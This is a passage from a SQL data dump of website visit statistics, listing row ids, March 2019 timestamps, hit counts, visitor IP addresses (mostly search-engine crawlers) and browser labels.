0,'54.36.150.112','other'),(401245,1552926527,1,1,0,0,'66.249.64.29','chrome'),(401246,1552926799,1,1,0,0,'54.36.150.16','other'),(401247,1552927012,1,1,0,0,'207.46.13.191','other'),(401248,1552927243,1,1,0,0,'46.229.168.144','other'),(401249,1552927571,1,1,0,0,'109.201.152.3','other'),(401250,1552927729,1,1,0,0,'54.36.150.85','other'),(401251,1552927810,1,1,0,0,'207.46.13.113','other'),(401252,1552928095,2,2,0,0,'207.46.13.191','other'),(401253,1552928195,1,1,0,0,'54.36.148.202','other'),(401254,1552928407,1,1,0,0,'46.229.168.153','other'),(401255,1552928520,1,1,0,0,'46.211.135.9','chrome'),(401256,1552928522,1,1,0,0,'54.36.148.183','other'),(401257,1552928904,1,1,0,0,'178.154.244.11','other'),(401258,1552929475,2,2,0,0,'5.45.207.19','other'),(401259,1552929564,1,1,0,0,'95.108.213.4','other'),(401260,1552929610,2,2,0,0,'5.45.207.79','other'),(401261,1552929781,1,1,0,0,'46.229.168.148','other'),(401262,1552929899,1,1,0,0,'54.36.148.111','other'),(401263,1552929910,3,3,0,0,'66.249.64.31','chrome'),(401264,1552929986,1,1,0,0,'207.46.13.113','other'),(401265,1552929989,1,1,0,0,'91.196.178.52','chrome'),(401266,1552930339,1,1,0,0,'66.249.64.30','chrome'),(401267,1552930461,1,1,0,0,'176.104.3.182','chrome'),(401268,1552930478,1,1,0,0,'209.17.97.26','other'),(401269,1552930659,2,2,0,0,'207.46.13.191','other'),(401270,1552931027,2,1,1,0,'66.249.66.134',''),(401271,1552931076,1,1,0,0,'54.36.148.91','other'),(401272,1552931376,1,1,0,0,'8.29.198.25','other'),(401273,1552931385,1,1,0,0,'8.29.198.26','other'),(401274,1552931484,1,1,0,0,'5.45.207.19','other'),(401275,1552931663,1,1,0,0,'207.46.13.191','other'),(401276,1552931809,1,1,0,0,'66.249.66.134','chrome'),(401277,1552932144,2,2,0,0,'66.249.66.136','chrome'),(401278,1552932428,1,1,0,0,'46.229.168.130','other'),(401279,1552932478,1,1,0,0,'54.36.148.26','other'),(401280,1552932867,1,1,0,0,'91.196.121.8','chrome'),(401281,1552933276,1,1,0,0,'46.211.112.255','chrome'),(401282,1552933398,1,1,0,0,'54.36.149.54','other'),(401283,1552933442,1,1,0,0,'66.249.66.134','chrome'),(401284,1552933525,1,1,0,0,'207.46.13.113','other'),(401285,1552934336,1,1,0,0,'66.249.66.136','chrome'),(401286,1552934365,1,1,0,0,'207.46.13.191','other'),(401287,1552934429,1,1,0,0,'54.36.149.68','other'),(401288,1552934675,1,1,0,0,'46.229.168.145','other'),(401289,1552934770,1,1,0,0,'54.36.149.19','other'),(401290,1552934819,1,1,0,0,'54.36.149.83','other'),(401291,1552934846,1,1,0,0,'54.36.148.149','other'),(401292,1552934864,1,1,0,0,'46.229.168.133','other'),(401293,1552934890,1,1,0,0,'54.36.148.142','other'),(401294,1552935492,1,1,0,0,'54.36.150.165','other'),(401295,1552935505,1,1,0,0,'54.36.148.180','other'),(401296,1552935810,1,1,0,0,'54.36.148.49','other'),(401297,1552935858,1,1,0,0,'66.249.66.60','chrome'),(401298,1552935951,1,1,0,0,'66.249.66.138','chrome'),(401299,1552935957,1,1,0,0,'54.36.150.76','other'),(401300,1552936196,1,1,0,0,'91.196.178.81','firefox'),(401301,1552936703,1,1,0,0,'54.36.148.1','other'),(401302,1552936867,1,1,0,0,'54.36.148.129','other'),(401303,1552937179,1,1,0,0,'54.36.148.156','other'),(401304,1552937219,1,1,0,0,'46.229.168.152','other'),(401305,1552937244,1,1,0,0,'54.36.150.106','other'),(401306,1552937443,1,1,0,0,'95.108.213.4','other'),(401307,1552937465,1,1,0,0,'207.46.13.191','other'),(401308,1552937467,1,1,0,0,'46.229.168.140','other'),(401309,1552937626,1,1,0,0,'46.229.168.154','other'),(401310,1552937645,1,1,0,0,'91.124.119.243','chrome'),(401311,1552937669,1,1,0,0,'54.36.148.247','other'),(401312,1552938101,1,1,0,0,'54.36.149.74','other'),(401313,1552938235,1,1,0,0,'178.154.244.11','other'),(401314,1552938360,1,1,0,0,'46.229.168.129','other'),(401315,1552938840,1,1,0,0,'40.77.167.130','other'),(401316,1552938972,1,1,0,0,'54.36.149.107','other'),(401317,1552939225,1,1,0,0,'54.36.148.67','other'),(401318,1552939372,1,1,0,0,'95.108.213.4','other'),(401319,1552939425,1,1,0,0,'46.229.168.146','other'),(401320,1552939552,1,1,0,0,'46.229.168.136','other'),(401321,1552939600,1,1,0,0,'66.249.66.58','chrome'),(401322,1552939751,1,1,0,0,'93.84.207.242','chrome'),(401323,1552940080,1,1,0,0,'207.46.13.191','other'),(401324,1552940680,1,1,0,0,'54.36.150.39','other'),(401325,1552940796,1,1,0,0,'180.76.15.157','other'),(401326,1552940830,1,1,0,0,'54.36.150.16','other'),(401327,1552940939,1,1,0,0,'54.36.150.70','other'),(401328,1552940969,1,1,0,0,'46.229.168.146','other'),(401329,1552941045,2,2,0,0,'66.249.66.134','chrome'),(401330,1552941051,1,1,0,0,'66.249.66.136','chrome'),(401331,1552941071,1,1,0,0,'52.53.201.78','chrome'),(401332,1552941088,1,1,0,0,'54.36.150.122','other'),(401333,1552941168,1,1,0,0,'46.229.168.143','other'),(401334,1552941759,1,1,0,0,'51.255.65.46','other'),(401335,1552941860,1,1,0,0,'141.8.142.103','other'),(401336,1552942150,1,1,0,0,'95.108.213.4','other'),(401337,1552942223,2,2,0,0,'8.29.198.26','other'),(401338,1552942438,1,1,0,0,'216.244.66.241','other'),(401339,1552942552,1,1,0,0,'66.249.66.134','chrome'),(401340,1552942798,1,1,0,0,'180.76.15.163','other'),(401341,1552943102,1,1,0,0,'66.249.66.138','chrome'),(401342,1552943119,1,1,0,0,'66.249.66.58','chrome'),(401343,1552943169,1,1,0,0,'54.36.148.14','other'),(401344,1552943223,1,1,0,0,'54.36.148.231','other'),(401345,1552943469,2,2,0,0,'66.249.66.62','chrome'),(401346,1552943824,1,1,0,0,'54.36.150.164','other'),(401347,1552943966,1,1,0,0,'46.211.110.70','chrome'),(401348,1552943968,1,1,0,0,'54.36.150.44','other'),(401349,1552944113,1,1,0,0,'54.36.148.98','other'),(401350,1552944406,1,1,0,0,'46.229.168.134','other'),(401351,1552944696,1,1,0,0,'40.77.167.130','other'),(401352,1552944882,1,1,0,0,'46.229.168.144','other'),(401353,1552945121,1,1,0,0,'54.36.148.109','other'),(401354,1552945292,1,1,0,0,'157.55.39.62','other'),(401355,1552946158,1,1,0,0,'54.36.150.165','other'),(401356,1552946387,3,3,0,0,'5.9.66.153','other'),(401357,1552946469,1,1,0,0,'54.36.148.131','other'),(401358,1552946504,1,1,0,0,'46.229.168.133','other'),(401359,1552946714,1,1,0,0,'157.55.39.63','other'),(401360,1552947150,1,1,0,0,'54.36.150.14','other'),(401361,1552947949,3,3,0,0,'141.8.142.103','other'),(401362,1552947994,1,1,0,0,'54.36.148.190','other'),(401363,1552948112,1,1,0,0,'54.36.150.46','other'),(401364,1552948386,1,1,0,0,'66.249.66.138','chrome'),(401365,1552948449,1,1,0,0,'37.9.113.103','other'),(401366,1552948582,1,1,0,0,'109.70.100.19','chrome'),(401367,1552948585,2,2,0,0,'157.55.39.66','other'),(401368,1552948877,1,1,0,0,'54.36.148.236','other'),(401369,1552948878,1,1,0,0,'54.36.150.121','other'),(401370,1552949202,1,1,0,0,'66.249.66.60','chrome'),(401371,1552949549,1,1,0,0,'54.36.149.96','other'),(401372,1552949686,1,1,0,0,'157.55.39.66','other'),(401373,1552949779,1,1,0,0,'54.36.148.93','other'),(401374,1552950119,2,2,0,0,'54.36.148.73','other'),(401375,1552950243,1,1,0,0,'66.249.66.134','chrome'),(401376,1552951101,1,1,0,0,'93.76.251.211','chrome'),(401377,1552951361,1,1,0,0,'157.55.39.62','other'),(401378,1552951446,1,1,0,0,'54.36.148.128','other'),(401379,1552951880,1,1,0,0,'54.36.150.183','other'),(401380,1552952135,1,1,0,0,'54.36.148.232','other'),(401381,1552952427,1,1,0,0,'54.36.149.24','other'),(401382,1552952646,1,1,0,0,'66.249.66.58','chrome'),(401383,1552952784,1,1,0,0,'46.229.168.141','other'),(401384,1552953035,1,1,0,0,'54.36.150.48','other'),(401385,1552953077,1,1,0,0,'8.29.198.27','other'),(401386,1552953099,1,1,0,0,'8.29.198.25','other'),(401387,1552953262,1,1,0,0,'54.36.148.250','other'),(401388,1552953484,1,1,0,0,'66.249.66.136','chrome'),(401389,1552953783,1,1,0,0,'46.229.168.154','other'),(401390,1552953820,1,1,0,0,'157.55.39.62','other'),(401391,1552953900,1,1,0,0,'66.249.66.60','chrome'),(401392,1552953922,1,1,0,0,'54.36.150.26','other'),(401393,1552954157,1,1,0,0,'46.229.168.142','other'),(401394,1552954242,1,1,0,0,'87.250.224.65','other'),(401395,1552954587,1,1,0,0,'46.229.168.129','other'),(401396,1552954600,1,1,0,0,'54.36.150.46','other'),(401397,1552954761,1,1,0,0,'66.249.66.136','chrome'),(401398,1552954772,1,1,0,0,'207.46.13.74','other'),(401399,1552954780,1,1,0,0,'54.36.149.92','other'),(401400,1552955154,1,1,0,0,'46.229.168.154','other'),(401401,1552955355,1,1,0,0,'54.36.150.49','other'),(401402,1552955464,1,1,0,0,'54.36.150.172','other'),(401403,1552955700,1,1,0,0,'46.229.168.138','other'),(401404,1552956429,1,1,0,0,'66.249.66.134','chrome'),(401405,1552956667,1,1,0,0,'54.36.150.150','other'),(401406,1552957042,1,1,0,0,'109.70.100.20','chrome'),(401407,1552957103,1,1,0,0,'54.36.149.63','other'),(401408,1552957302,1,1,0,0,'54.36.148.36','other'),(401409,1552957348,1,1,0,0,'35.163.137.178','other'),(401410,1552957371,1,1,0,0,'54.36.148.62','other'),(401411,1552957922,1,1,0,0,'66.249.66.138','chrome'),(401412,1552957923,1,1,0,0,'95.108.213.4','other'),(401413,1552958058,1,1,0,0,'87.250.224.47','other'),(401414,1552958243,2,2,0,0,'5.45.207.79','other'),(401415,1552958361,1,1,0,0,'54.36.148.54','other'),(401416,1552958373,1,1,0,0,'87.250.224.81','other'),(401417,1552958397,1,1,0,0,'54.36.150.148','other'),(401418,1552958585,1,1,0,0,'157.55.39.179','other'),(401419,1552958623,1,1,0,0,'46.229.168.149','other'),(401420,1552959010,1,1,0,0,'40.77.167.216','other'),(401421,1552959162,1,1,0,0,'213.180.203.9','other'),(401422,1552959285,1,1,0,0,'87.250.224.65','other'),(401423,1552959473,2,2,0,0,'66.249.66.138','chrome'),(401424,1552959483,1,1,0,0,'54.36.150.64','other'),(401425,1552959689,1,1,0,0,'54.36.148.72','other'),(401426,1552959896,1,1,0,0,'5.45.207.79','other'),(401427,1552960161,1,1,0,0,'37.9.113.20','other'),(401428,1552960532,1,1,0,0,'46.229.168.129','other'),(401429,1552960562,1,1,0,0,'54.36.150.159','other'),(401430,1552960600,3,3,0,0,'66.249.66.134','chrome'),(401431,1552960935,1,1,0,0,'91.209.11.236','other'),(401432,1552960938,1,1,0,0,'54.36.150.104','other'),(401433,1552961217,2,2,0,0,'40.77.167.216','other'),(401434,1552961577,1,1,0,0,'66.249.66.138','chrome'),(401435,1552961609,1,1,0,0,'54.36.149.71','other'),(401436,1552962470,2,2,0,0,'34.222.7.134','chrome'),(401437,1552962672,1,1,0,0,'54.36.150.40','other'),(401438,1552962893,1,1,0,0,'66.249.66.134','chrome'),(401439,1552962905,1,1,0,0,'66.249.66.138','chrome'),(401440,1552963098,1,1,0,0,'207.46.13.242','other'),(401441,1552963151,1,1,0,0,'66.249.66.62','chrome'),(401442,1552963857,1,1,0,0,'54.36.150.98','other'),(401443,1552963911,1,1,0,0,'54.36.150.47','other'),(401444,1552963917,2,2,0,0,'8.29.198.26','other'),(401445,1552963986,1,1,0,0,'54.36.148.34','other'),(401446,1552964109,1,1,0,0,'66.249.66.136','chrome'),(401447,1552964132,1,1,0,0,'54.36.148.187','other'),(401448,1552964506,2,2,0,0,'207.46.13.242','other'),(401449,1552964661,1,1,0,0,'54.36.148.38','other'),(401450,1552965099,1,1,0,0,'54.36.148.134','other'),(401451,1552966088,1,1,0,0,'54.36.149.34','other'),(401452,1552966136,1,1,0,0,'66.249.66.134','chrome'),(401453,1552966185,182,182,0,0,'95.216.2.253','other'),(401454,1552966243,1,1,0,0,'46.229.168.134','other'),(401455,1552966317,1,1,0,0,'216.244.66.241','other'),(401456,1552966471,1,1,0,0,'66.249.66.136','chrome'),(401457,1552966635,4,4,0,0,'157.55.39.95','other'),(401458,1552966637,1,1,0,0,'54.36.149.102','other'),(401459,1552966747,1,1,0,0,'66.249.66.58','chrome'),(401460,1552966848,1,1,0,0,'54.36.150.23','other'),(401461,1552966889,1,1,0,0,'66.249.66.60','chrome'),(401462,1552966954,1,1,0,0,'54.36.150.184','other'),(401463,1552966959,1,1,0,0,'54.36.150.143','other'),(401464,1552967020,4,4,0,0,'40.77.167.24','other'),(401465,1552967062,3,3,0,0,'207.46.13.242','other'),(401466,1552967568,1,1,0,0,'5.255.253.25','other'),(401467,1552967720,1,1,0,0,'178.154.244.11','other'),(401468,1552967738,1,1,0,0,'141.8.142.108','other'),(401469,1552967809,3,3,0,0,'95.108.213.4','other'),(401470,1552968128,1,1,0,0,'178.154.244.65','other'),(401471,1552968157,1,1,0,0,'54.36.148.176','other'),(401472,1552968211,1,1,0,0,'54.36.150.62','other'),(401473,1552968467,1,1,0,0,'95.91.105.91','other'),(401474,1552968507,1,1,0,0,'87.250.224.65','other'),(401475,1552968517,1,1,0,0,'37.9.113.103','other'),(401476,1552968590,2,2,0,0,'178.154.171.69','other'),(401477,1552968671,1,1,0,0,'216.244.66.241','other'),(401478,1552968849,1,1,0,0,'178.154.244.11','other'),(401479,1552968877,1,1,0,0,'54.36.149.11','other'),(401480,1552968979,1,1,0,0,'46.229.168.150','other'),(401481,1552969000,1,1,0,0,'54.36.150.95','other'),(401482,1552969189,1,1,0,0,'46.96.2.147','chrome'),(401483,1552969190,1,1,0,0,'66.249.83.200','chrome'),(401484,1552969197,1,1,0,0,'66.249.83.198','chrome'),(401485,1552969199,1,1,0,0,'66.249.83.202','chrome'),(401487,1552969373,1,1,0,0,'54.36.150.63','other'),(401488,1552969509,1,1,0,0,'54.36.148.236','other'),(401489,1552969671,1,1,0,0,'54.36.148.177','other'),(401490,1552969699,1,1,0,0,'46.229.168.146','other'),(401491,1552969811,1,1,0,0,'46.229.168.129','other'),(401492,1552969867,1,1,0,0,'54.36.148.113','other'),(401493,1552970261,1,1,0,0,'5.255.253.38','other'),(401494,1552970472,1,1,0,0,'46.229.168.149','other'),(401495,1552970520,1,1,0,0,'54.36.149.27','other'),(401496,1552970576,1,1,0,0,'157.55.39.95','other'),(401497,1552970647,1,1,0,0,'54.36.148.237','other'),(401498,1552971060,1,1,0,0,'207.46.13.242','other'),(401499,1552971527,1,1,0,0,'216.244.66.241','other'),(401500,1552971745,1,1,0,0,'40.77.167.24','other'),(401501,1552971781,1,1,0,0,'66.249.66.134','chrome'),(401502,1552971841,1,1,0,0,'66.249.66.138','chrome'),(401503,1552972274,1,1,0,0,'199.249.230.76','chrome'),(401504,1552972898,1,1,0,0,'46.229.168.152','other'),(401505,1552972930,1,1,0,0,'46.229.168.150','other'),(401506,1552973027,1,1,0,0,'46.229.168.153','other'),(401507,1552973065,1,1,0,0,'40.77.167.24','other'),(401508,1552973147,1,1,0,0,'54.36.148.35','other'),(401509,1552973502,1,1,0,0,'66.249.66.136','chrome'),(401510,1552973896,1,1,0,0,'66.249.66.138','chrome'),(401511,1552974386,1,1,0,0,'46.229.168.150','other'),(401512,1552974562,1,1,0,0,'216.244.66.241','other'),(401513,1552974656,1,1,0,0,'46.229.168.142','other'),(401514,1552974681,1,1,0,0,'64.120.28.193','chrome'),(401515,1552974752,1,1,0,0,'8.29.198.25','other'),(401516,1552974812,1,1,0,0,'8.29.198.27','other'),(401517,1552975355,1,1,0,0,'54.36.148.18','other'),(401518,1552975455,1,1,0,0,'46.229.168.148','other'),(401519,1552975684,1,1,0,0,'54.36.148.29','other'),(401520,1552975765,1,1,0,0,'54.36.150.140','other'),(401521,1552975793,1,1,0,0,'54.36.148.162','other'),(401522,1552976487,1,1,0,0,'178.154.244.65','other'),(401523,1552976596,1,1,0,0,'178.154.171.27','other'),(401524,1552976614,1,1,0,0,'185.220.101.67','other'),(401525,1552976624,1,1,0,0,'37.9.113.20','other'),(401526,1552976642,2,2,0,0,'178.154.200.48','other'),(401527,1552976697,1,1,0,0,'5.45.207.79','other'),(401528,1552976718,1,1,0,0,'54.36.148.20','other'),(401529,1552976783,1,1,0,0,'54.36.150.1','other'),(401530,1552976799,1,1,0,0,'5.45.207.19','other'),(401531,1552976964,1,1,0,0,'66.249.66.138','chrome'),(401532,1552977009,1,0,1,0,'66.249.66.62',''),(401533,1552977019,1,1,0,0,'46.229.168.135','other'),(401534,1552977121,1,1,0,0,'54.36.150.150','other'),(401535,1552977147,1,1,0,0,'46.229.168.133','other'),(401536,1552977198,1,1,0,0,'46.229.168.132','other'),(401537,1552977263,1,1,0,0,'46.229.168.146','other'),(401538,1552977334,1,1,0,0,'180.76.15.7','other'),(401539,1552977766,1,1,0,0,'40.77.167.99','other'),(401540,1552978040,1,1,0,0,'37.52.99.228','chrome'),(401541,1552978114,1,1,0,0,'54.36.150.189','other'),(401542,1552978531,1,1,0,0,'46.229.168.146','other'),(401543,1552978795,3,3,0,0,'185.234.217.78','firefox'),(401544,1552978851,1,1,0,0,'40.77.167.99','other'),(401545,1552979334,1,1,0,0,'180.76.15.159','other'),(401546,1552979348,1,1,0,0,'46.229.168.130','other'),(401547,1552979391,1,1,0,0,'157.55.39.106','other'),(401548,1552979403,1,1,0,0,'54.36.148.155','other'),(401549,1552979443,1,0,1,0,'66.249.66.138',''),(401550,1552979451,1,1,0,0,'54.36.149.35','other'),(401551,1552979585,1,1,0,0,'185.234.217.78','other'),(401552,1552979589,1,1,0,0,'185.234.217.78','chrome'),(401553,1552979596,1,1,0,0,'46.229.168.138','other'),(401554,1552979768,1,1,0,0,'54.36.148.126','other'),(401555,1552979921,1,1,0,0,'54.36.149.101','other'),(401556,1552980054,1,1,0,0,'91.196.178.93','chrome'),(401557,1552980113,2,2,0,0,'185.234.217.78','firefox'),(401558,1552980115,1,1,0,0,'46.211.125.139','chrome'),(401559,1552980337,1,1,0,0,'54.36.150.115','other'),(401560,1552980504,1,1,0,0,'54.36.148.32','other'),(401561,1552980558,1,1,0,0,'185.234.217.78','opera'),(401562,1552980600,1,1,0,0,'66.249.66.136','chrome'),(401563,1552981067,1,1,0,0,'46.229.168.129','other'),(401564,1552981320,1,1,0,0,'185.234.217.78','firefox'),(401565,1552981412,1,1,0,0,'40.77.167.99','other'),(401566,1552981581,1,1,0,0,'54.36.150.79','other'),(401567,1552981653,1,1,0,0,'54.36.150.102','other'),(401568,1552982108,1,1,0,0,'46.229.168.133','other'),(401569,1552982152,1,1,0,0,'185.200.60.8','chrome'),(401570,1552982193,1,1,0,0,'185.234.217.78','opera'),(401571,1552982245,2,2,0,0,'185.234.217.78','chrome'),(401572,1552982246,1,1,0,0,'185.234.217.78','firefox'),(401573,1552982403,1,1,0,0,'54.36.148.248','other'),(401574,1552982751,1,1,0,0,'40.77.167.24','other'),(401575,1552983398,1,1,0,0,'91.209.11.236','other'),(401576,1552983406,1,1,0,0,'54.36.148.27','other'),(401577,1552983416,1,1,0,0,'54.36.148.131','other'),(401578,1552983637,1,1,0,0,'46.229.168.152','other'),(401579,1552983666,1,1,0,0,'46.229.168.132','other'),(401580,1552983700,1,1,0,0,'82.207.49.94','chrome'),(401581,1552983761,2,2,0,0,'5.188.211.100','firefox'),(401582,1552983804,1,1,0,0,'54.36.148.231','other'),(401583,1552983864,1,1,0,0,'54.36.148.120','other'),(401584,1552983966,1,1,0,0,'54.36.148.176','other'),(401585,1552984051,1,1,0,0,'185.200.60.8','chrome'),(401586,1552984337,1,1,0,0,'46.229.168.145','other'),(401587,1552984844,2,2,0,0,'171.25.171.207','chrome'),(401588,1552984922,1,1,0,0,'213.180.203.40','other'),(401589,1552985133,1,1,0,0,'46.229.168.149','other'),(401590,1552985227,2,2,0,0,'66.249.66.138','chrome'),(401591,1552985331,1,1,0,0,'54.36.150.51','other'),(401592,1552985332,1,1,0,0,'66.249.66.134','chrome'),(401593,1552985417,1,1,0,0,'66.249.66.136','chrome'),(401594,1552985455,1,1,0,0,'91.196.179.33','chrome'),(401595,1552985470,1,1,0,0,'46.119.115.99','chrome'),(401596,1552985570,1,1,0,0,'46.229.168.151','other'),(401597,1552985595,2,2,0,0,'8.29.198.27','other'),(401598,1552985687,1,1,0,0,'37.52.99.228','firefox'),(401599,1552985748,1,1,0,0,'54.36.148.210','other'),(401600,1552985889,1,1,0,0,'207.46.13.143','other'),(401601,1552986160,1,1,0,0,'54.36.149.12','other'),(401602,1552986447,1,1,0,0,'46.229.168.145','other'),(401603,1552986499,1,1,0,0,'54.36.149.67','other'),(401604,1552986762,1,1,0,0,'77.93.34.44','chrome'),(401605,1552986768,1,1,0,0,'66.249.66.136','chrome'),(401606,1552986830,1,1,0,0,'95.133.35.46','chrome'),(401607,1552986836,1,1,0,0,'91.196.178.90','chrome'),(401608,1552986998,1,1,0,0,'66.249.66.62','chrome'),(401609,1552987139,1,1,0,0,'66.249.66.134','chrome'),(401610,1552987244,1,1,0,0,'54.36.150.148','other'),(401611,1552987282,1,1,0,0,'54.36.149.31','other'),(401612,1552988012,1,1,0,0,'66.249.66.138','chrome'),(401613,1552988034,1,1,0,0,'46.229.168.130','other'),(401614,1552988141,1,1,0,0,'54.36.150.53','other'),(401615,1552988251,1,1,0,0,'54.36.150.76','other'),(401616,1552988252,1,1,0,0,'66.249.66.58','chrome'),(401617,1552988289,1,1,0,0,'54.36.148.61','other'),(401618,1552988521,1,1,0,0,'91.210.116.146','chrome'),(401619,1552988824,2,2,0,0,'207.46.13.143','other'),(401620,1552988904,2,2,0,0,'91.196.178.90','chrome'),(401621,1552988943,1,1,0,0,'66.249.66.138','chrome'),(401622,1552988964,1,1,0,0,'46.229.168.148','other'),(401623,1552988965,118,118,0,0,'171.25.171.207','chrome'),(401624,1552989572,1,1,0,0,'54.36.148.220','other'),(401625,1552989978,1,1,0,0,'54.36.148.168','other'),(401626,1552990098,1,1,0,0,'54.36.148.2','other'),(401627,1552990250,3,3,0,0,'5.9.156.20','other'),(401628,1552990293,1,1,0,0,'46.229.168.134','other'),(401629,1552990309,1,1,0,0,'91.124.182.170','firefox'),(401630,1552990431,1,1,0,0,'46.229.168.135','other'),(401631,1552990588,1,1,0,0,'54.36.149.94','other'),(401632,1552990601,1,1,0,0,'54.36.148.246','other'),(401633,1552990640,2,2,0,0,'66.249.66.134','chrome'),(401634,1552990741,1,1,0,0,'46.229.168.140','other'),(401635,1552990760,1,1,0,0,'91.196.178.86','firefox'),(401636,1552990780,39,39,0,0,'5.189.171.199','other'),(401637,1552990799,1,1,0,0,'46.229.168.141','other'),(401638,1552990952,1,1,0,0,'194.187.106.118','firefox'),(401639,1552991183,2,2,0,0,'66.249.66.138','chrome'),(401640,1552991350,1,1,0,0,'91.124.182.170','firefox'),(401641,1552991453,1,1,0,0,'46.229.168.142','other'),(401642,1552991543,1,1,0,0,'66.249.66.134','chrome'),(401643,1552991713,1,1,0,0,'54.36.149.14','other'),(401644,1552992157,1,1,0,0,'40.77.167.105','other'),(401645,1552992522,2,2,0,0,'66.249.66.136','chrome'),(401646,1552992533,1,1,0,0,'91.124.182.170','firefox'),(401647,1552992803,2,2,0,0,'94.178.107.41','chrome'),(401648,1552992820,1,1,0,0,'54.36.148.172','other'),(401649,1552992898,1,1,0,0,'46.211.133.228','chrome'),(401650,1552992909,1,1,0,0,'54.36.150.143','other'),(401651,1552993081,1,1,0,0,'95.132.43.140','firefox'),(401652,1552993083,1,1,0,0,'66.249.66.138','chrome'),(401653,1552993197,1,1,0,0,'54.36.150.159','other'),(401654,1552993283,1,1,0,0,'46.229.168.149','other'),(401655,1552993320,1,1,0,0,'40.77.167.105','other'),(401656,1552993406,2,2,0,0,'5.188.211.100','firefox'),(401657,1552993516,1,1,0,0,'54.36.149.40','other'),(401658,1552993596,1,1,0,0,'54.36.148.94','other'),(401659,1552993912,1,1,0,0,'54.36.150.81','other'),(401660,1552993957,1,1,0,0,'54.36.149.61','other'),(401661,1552994032,1,1,0,0,'46.229.168.145','other'),(401662,1552994255,1,1,0,0,'5.248.165.148','chrome'),(401663,1552994328,1,1,0,0,'66.249.66.134','chrome'),(401664,1552994419,1,1,0,0,'141.8.142.103','other'),(401665,1552994521,1,1,0,0,'5.45.207.79','other'),(401666,1552994686,1,1,0,0,'5.45.207.8','other'),(401667,1552994735,1,1,0,0,'54.36.149.50','other'),(401668,1552994899,1,1,0,0,'213.180.203.9','other'),(401669,1552994931,1,1,0,0,'54.36.148.32','other'),(401670,1552995225,1,1,0,0,'54.36.150.122','other'),(401671,1552995444,1,1,0,0,'54.36.148.110','other'),(401672,1552995659,1,1,0,0,'54.36.150.35','other'),(401673,1552995702,1,1,0,0,'207.46.13.125','other'),(401674,1552995790,1,1,0,0,'54.36.148.212','other'),(401675,1552995979,1,1,0,0,'54.36.148.39','other'),(401676,1552996094,2,2,0,0,'66.249.66.58','chrome'),(401677,1552996136,1,1,0,0,'40.77.167.105','other'),(401678,1552996262,1,1,0,0,'54.36.150.106','other'),(401679,1552996306,1,1,0,0,'54.36.149.21','other'),(401680,1552996310,2,2,0,0,'66.249.66.134','chrome'),(401681,1552996446,1,1,0,0,'8.29.198.26','other'),(401682,1552996524,1,1,0,0,'8.29.198.27','other'),(401683,1552996688,1,1,0,0,'54.36.149.34','other'),(401684,1552996804,1,1,0,0,'5.248.165.148','chrome'),(401685,1552996905,1,1,0,0,'91.196.178.36','chrome'),(401686,1552997302,1,1,0,0,'46.229.168.134','other'),(401687,1552997318,1,1,0,0,'207.46.13.125','other'),(401688,1552997323,1,1,0,0,'66.249.66.138','chrome'),(401689,1552997625,1,1,0,0,'95.132.43.140','firefox'),(401690,1552997845,1,1,0,0,'91.124.182.170','firefox'),(401691,1552997898,1,1,0,0,'91.196.178.33','chrome'),(401692,1552998177,1,1,0,0,'54.36.149.34','other'),(401693,1552998243,1,1,0,0,'54.36.150.68','other'),(401694,1552998249,1,1,0,0,'46.229.168.142','other'),(401695,1552998822,1,1,0,0,'91.196.178.33','chrome'),(401696,1552998931,1,1,0,0,'40.77.167.12','other'),(401697,1552999374,1,1,0,0,'54.36.150.8','other'),(401698,1552999380,1,1,0,0,'54.36.148.72','other'),(401699,1552999629,1,1,0,0,'54.36.148.252','other'),(401700,1552999755,1,1,0,0,'173.212.233.72','chrome'),(401701,1552999953,2,2,0,0,'207.46.13.172','other'),(401702,1553000223,1,1,0,0,'91.124.182.170','firefox'),(401703,1553000492,1,1,0,0,'54.36.150.36','other'),(401704,1553000565,1,1,0,0,'40.77.167.12','other'),(401705,1553000814,1,1,0,0,'157.55.39.152','other'),(401706,1553000890,1,1,0,0,'54.36.150.4','other'),(401707,1553000957,1,1,0,0,'46.211.96.197','chrome'),(401708,1553001180,1,1,0,0,'66.249.66.136','chrome'),(401709,1553001524,1,1,0,0,'46.229.168.142','other'),(401710,1553001805,1,1,0,0,'54.36.150.50','other'),(401711,1553001871,2,2,0,0,'66.249.66.134','chrome'),(401712,1553002358,1,1,0,0,'54.36.148.93','other'),(401713,1553002766,1,1,0,0,'141.8.142.103','other'),(401714,1553003172,1,1,0,0,'178.154.171.27','other'),(401715,1553003178,1,1,0,0,'141.8.142.38','other'),(401716,1553003252,1,1,0,0,'66.249.66.136','chrome'),(401717,1553003831,3,3,0,0,'95.108.213.4','other'),(401718,1553003915,1,1,0,0,'5.45.207.79','other'),(401719,1553004346,1,1,0,0,'87.250.224.47','other'),(401720,1553004467,1,1,0,0,'37.9.113.20','other'),(401721,1553004500,1,1,0,0,'178.154.244.11','other'),(401722,1553004635,1,1,0,0,'66.249.66.138','chrome'),(401723,1553004699,1,1,0,0,'54.36.148.42','other'),(401724,1553005395,1,1,0,0,'54.36.148.135','other'),(401725,1553005434,1,1,0,0,'178.154.244.11','other'),(401726,1553005772,1,1,0,0,'66.249.66.136','chrome'),(401727,1553005992,1,1,0,0,'91.196.178.65','firefox'),(401728,1553006206,1,1,0,0,'94.178.224.253','firefox'),(401729,1553006388,1,1,0,0,'54.36.150.191','other'),(401730,1553006400,1,1,0,0,'46.229.168.148','other'),(401731,1553006781,1,1,0,0,'40.77.167.12','other'),(401732,1553007057,1,1,0,0,'66.249.66.138','chrome'),(401733,1553007071,1,1,0,0,'37.52.165.48','chrome'),(401734,1553007265,1,1,0,0,'207.46.13.230','other'),(401735,1553007323,2,2,0,0,'8.29.198.25','other'),(401736,1553007403,1,1,0,0,'54.36.150.121','other'),(401737,1553007416,1,1,0,0,'46.229.168.135','other'),(401738,1553007519,1,1,0,0,'207.46.13.39','other'),(401739,1553007659,1,1,0,0,'178.154.244.11','other'),(401740,1553007660,1,1,0,0,'5.45.207.79','other'),(401741,1553008228,2,2,0,0,'77.222.134.102','chrome'),(401742,1553008968,2,2,0,0,'216.244.66.241','other'),(401743,1553008970,1,1,0,0,'54.36.150.117','other'),(401744,1553009125,2,2,0,0,'66.249.66.136','chrome'),(401745,1553009205,1,1,0,0,'77.222.134.102','chrome'),(401746,1553009229,1,1,0,0,'54.36.149.57','other'),(401747,1553009285,1,1,0,0,'54.36.149.16','other'),(401748,1553009393,1,1,0,0,'46.229.168.149','other'),(401749,1553009440,1,1,0,0,'54.36.148.57','other'),(401750,1553009675,1,1,0,0,'66.249.66.138','chrome'),(401751,1553009728,1,1,0,0,'54.36.150.86','other'),(401752,1553010014,1,1,0,0,'157.55.39.152','other'),(401753,1553010038,1,1,0